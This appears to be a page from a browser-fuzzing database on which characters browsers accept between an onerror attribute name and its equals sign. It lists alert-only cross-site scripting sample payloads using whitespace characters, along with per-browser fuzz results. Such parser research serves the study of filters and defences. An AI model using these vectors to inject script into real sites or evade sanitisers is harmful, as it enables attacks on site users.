Character allowed after onerror event
5
5
5I want to know which characters the browser accepts between an event handler and a equal sign.
Created by: InsertScript
Created on: Tuesday, April 2, 2024 at 9:47:31 AM
Updated on: Wednesday, May 28, 2025 at 5:06:03 PM
Category: HTML Parsing
Vector visibility: Public
Vector type: XSS
Vector charset: UTF-8
Template used:
<img src=x onerror$[chr]=log($[i])>Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<img src=x onerror0x09=alert(9)><img src=x onerror
=alert(10)><img src=x onerror0x0C=alert(12)><img src=x onerror0x0D=alert(13)><img src=x onerror =alert(32)>Fuzz results
Chrome 143.0.0.0 desktop macOS 10.15.7
Updated
Sun Jan 25 2026
Found 5 results
Loading...
Chrome 123.0.0.0 Unknown Unknownolder version
Updated
Sun Apr 14 2024
Found 5 results
Loading...
Firefox 124.0 Unknown Unknown
Updated
Sun Apr 14 2024
Found 5 results
Loading...
Safari 17.4 Unknown Unknown
Updated
Sun Apr 14 2024
Found 5 results
Loading...